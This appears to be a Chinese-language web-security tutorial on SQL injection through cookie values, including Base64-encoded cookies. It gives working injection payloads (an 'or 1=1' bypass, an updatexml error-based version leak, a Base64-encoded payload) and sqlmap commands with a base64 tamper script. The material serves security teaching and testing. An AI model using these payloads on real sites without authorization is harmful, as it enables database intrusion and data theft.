![](https://img.kancloud.cn/41/e0/41e066af9a6c25a24868d9667253ec98_1241x333.jpg)
*****
## cookie注入
### HTTP头中的注入介绍
服务器可以利用cookies包含信息的任意性来筛选并经常性维护这些信息,以判断在HTTP传 输中的状态。cookies最经典的应用就是判断用户是否已经登录网站。
### cookie注入
代码中使用Cookie传递参数,但是没有对Cookie中传递的参数进行过滤操作。导致SQL注入漏洞的产生。
注入的payload
```
Cookie: uname=admin' or 1=1 --+
Cookie: uname=admin' and updatexml(1,concat(0x7e,version(),0x7e),1) --+
```
### sqlmap安全测试
```
sqlmap -r target.txt --level 3 --batch
```
## cookie Base64注入
### Base64介绍
base64编码是从二进制到字符的过程,可用于在HTTP环境下传递较长的标识信息。base64是 网络上最常见的用于传输8Bit字节码的编码方式之一,base64就是一种基于64个可打印字符 来表示二进制数据的方法
将原始内容转换为二进制,从左到右依次取6位,然后在最高补两位0,形成新的内容
<br>编码规则
- 1.把3个字符变成4个字符
- 2.每76个字符加一个换行符
- 3.最后的结束符也要处理
### cookie Base64注入代码分析
base64加密网址:http://tool.oschina.net/encrypt?type=3
如果报出Warning: date(): 在php.ini中设置date.timezone的值为PRC,设置好以后的为:date.timezone=PRC
使用Base64加密的注入语句,插入到Cookie对应的位置完成SQL注入漏洞的探测。
明文 " or 1=1 #
```
IiBvciAxPTEgIw==
```
### sqlmap安全检测
```
python sqlmap.py -r target.txt --level 3 --tamper base64encode.py
```